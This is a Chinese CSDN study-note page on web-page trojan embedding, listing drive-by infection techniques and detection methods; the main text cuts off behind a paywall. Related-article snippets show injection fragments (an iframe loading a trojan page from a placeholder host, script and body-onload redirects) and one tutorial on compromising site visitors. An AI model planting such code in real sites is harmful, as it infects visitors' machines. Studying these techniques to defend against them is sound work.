学习记录03(网页挂马)

已于 2022-01-21 10:24:44 修改
阅读量1.8k 收藏 13
点赞数
文章标签: 安全 web安全
于 2020-05-24 20:08:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/B_roin/article/details/105258520
版权
本文详细介绍了网页挂马的常见方式,包括HTML、JS文件、body标签和CSS等挂马方法,以及检测和防范措施,如特征匹配、主动防御。强调了隐蔽性和伪装是挂马的关键,同时提到了URL加密、文件后缀篡改等进阶手段。
摘要由CSDN通过智能技术生成

网页挂马

将木马程序上传到网站,使用木马生成器生成一个网马,放到网页空间,在添加代码使木马在网页打开时运行

1.常见的几种方式
  • 将木马伪装成页面元素,木马被浏览器自动加载到本地
  • 利用脚本运行的漏洞下载木马
  • 利用脚本运行的漏洞释放隐含在网页脚本中的木马
  • 将木马伪装成缺失的组件。或和缺失的组件绑在一起(flash播放插件等)
  • 通过脚本运行调用某些com组件,利用其漏洞下载木马
  • 在渲染页面内容的过程中利用格式溢出释放木马(ani格式溢出漏洞等)
  • 在渲染页面内容的过程中利用格式溢出下载木马(flash9.0.115的播放漏洞等)

资料摘自:https://baike.baidu.com/item/%E7%BD%91%E9%A1%B5%E6%8C%82%E9%A9%AC/2368054?fr=aladdin

2.检测方法
  • 特征匹配:将网页挂马的脚本按脚本病毒进行检测,但是网页脚本变形方式、加密方式比起传统的PE格式病毒更为多样,检测起来也更加困难。
  • 主动防御:主动避免下载某些可能含有网马的插件,软件
  • 检查父进程是否为浏览器,这种方法很容易被躲过且会对很多插件造成误报。

资料摘自:https://baike.baidu.com/item/%E7%BD%91%E9%A1%B5%E6%8C%82%E9%A9%AC/2368054?fr=aladdin

3.常见的几种网页挂马方法
  • HTML挂马
  1. 需要利用<iframe> 标签
  2. <iframe src=&#
最低0.47元/天 解锁文章
B_ronin
关注
渗透系列:DNS欺骗的艺术 | 域名劫持和网页挂马
weixin_54626591的博客
01-23 99
DNS欺骗的艺术 | 域名劫持和网页挂马
XSS漏洞学习笔记
qi_SJQ_的博客
12-31 2689
xss学习笔记
网页挂马详细教程
php|nginx|python|vue|redis|linux
04-30 3599
其实很简单的的,说到原理,就一个:就是在人家网站的主页那里插入一个自己的网马的页面,等有漏洞的人查看了人家网站的主页,那么他就成了你的肉鸡了。下面我介绍5种方法,我一个一个介绍方法一:这个就是最简单的了,只要你懂点html语言把下面这段代码插进网页中:我来插入,理论上来说插到任何地方都行,只是不要把html语言给弄乱了就行本来没有插进去的页面就是这样,不知道网易那里有没有弹出的
html网页挂马,浏览器安全网页挂马实战 ——合天网安实验室学习笔记
weixin_29310605的博客
06-18 2749
实验连接网页挂马指的是把一个木马程序上传到网站里面,使得木马在打开网页时运行。网页挂马方式包括框架挂马、js文件挂马、body挂马、css挂马、图片假装等。经过实验了解网页挂马相关知识,学会使用框架挂马并进行相关利用。css实验简介实验所属系列: Web安全web实验对象: 本科/专科信息安全专业数据库相关课程及专业: 计算机基础、HTML、Linuxapache实验类别: 实践实验类vim预备知...
网站钓鱼——挂马技术手段介绍
最新发布
无问社区的博客
09-09 758
网站挂马目前已经成为流氓软件以及红队人员快速获取目标主机权限的常用手段之一,在长时间的实战中也是出现了层出不穷的钓鱼方法,这次分享一下实际场景中出现次数较高的几种挂马方式。
挂马方法和技巧详解
北冥
03-28 1815
(1) HTML挂马法。   常规的HTML挂马方法一般是在网页中插入一条iframe语句,像。查看站点是否被挂,一般是查找一下关键词iframe。(2) 再隐藏一点的就是js挂马了。  像再原来的网页中写入 ,horse里的js写法一般为 document.write(’http:\/\/www.xxx.com\/horse.html’>;,或者专业一点的写法是 top.document.b
网页挂马
山高人为峰!
02-26 854
<br />一.  网页挂马的概念:<br /><br />      网页挂马是指:在获取网站或者网站服务器的部分或者全部权限后,在网页文件中插入一段恶意代码,这些恶意代码主要是一些包括IE等漏洞利用代码,用户访问被挂马的页面时,如果系统没有更新恶意代码中利用的漏洞补丁,则会执行恶意代码程序,进行盗号等危险操作。<br /><br />二.常见的网页挂马方式:<br /><br /><br />1.框架挂马:<br />  <iframe src=http://www.xxx.com/muma.htm w
网页挂马的原理和实现方式
weixin_33670786的博客
11-21 4928
网页挂马 一、网页挂马介绍 (1)、挂马与网马 1、挂马 Ø从“挂马”这个词中就知道,它和“木马”脱离不了关系,的确,挂马的目的就是将木马传播出去 Ø黑客入侵了一些网站之后,将自己编定的网页木马嵌入到其网站的页面(能常是在网站主页)中,利用该网站的流量将自己的网页木马传播出去从页达到自己的目的 2、网马 Ø网马,即“网页木马”,就是将木马和网页结合在一起...
XSS学习笔记
m0_47599604的博客
03-18 597
XSS介绍以及分类 XSS介绍 XSS (cross site scripting)跨站脚本,较适合的方式应该叫做跨站脚本攻击,诞生于1996年,人们经常将跨站脚本攻击(cross site scripting)缩写为CSS,但这会层叠样式表(cascading style sheets,CSS )的缩写混淆,因此,有人把跨站脚本攻击缩写为XSS。 分类 反射型(非持久型): 攻击者事先做好攻击链接,需要欺骗用户自己去点击链接才能触发漏洞。 存储型(持久型): payl..
网站挂马工具类
04-25
文件操作,数据库操作,开进程执行 上传,转移位置,最后修改时间,执行程序,读写文件,SQL数据库操作 查看数据库结构 服务器上的操作基本都能实现
一个网站挂马检测工具
10-19
一个小巧的工具,用来检查网站文件或者网络文件是否被添加了危险代码。
详解网站挂马方法
11-21
详解网站挂马方法/教会你如何渗透网站挂马,抓肉鸡等
网页多种挂马代码,JS
09-13
本文件内涵多种挂马代码。含有HTM JS调用等等,涉及到网页函数。
网页挂马工作原理完全分析
01-09
网页挂马工作原理完全分析,希望识货的人过来赶快拿啊~~
网页挂马了怎么办呢
tianrva的专栏
08-01 513
首先,咱们了解一下网页挂马是什么意思: 网页挂马指的是把一个木马程序上传到一个网站里面然后用木马生成器生一个网马,再上到空间里面!再加代码使得木马在打开网页时运行!
网页挂马的常见方式
weixin_33989780的博客
04-03 485
网页挂马网页挂马指的是把一个***程序上传到一个网站里面然后用***生成器生一个网马,再上到空间里面!再加代码使得***在打开网页是运行! 几种挂马的方式,给大家总结出来,希望能有所帮助。在***了一个站拿到了webshell的时候,最常见的挂站代码如下 :(一)启动时加载一个网页: CODE:<body onload="window.location='网页***地...
网页木马挂马的实现与防范
qq_43678263的博客
12-10 2483
网页木马挂马的实现与防范
网页挂马类型
安静
06-01 1317
一:框架挂马 二:js文件挂马首先将以下代码document.write("");保存为xxx.js,则JS挂马代码为 三:js变形加密 muma.txt可改成任意后缀四:body挂马五:隐蔽挂马top.document.body.innerHTML = top.document.body.innerHTML + /r/n;六:css中挂马body { background-image: ur
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值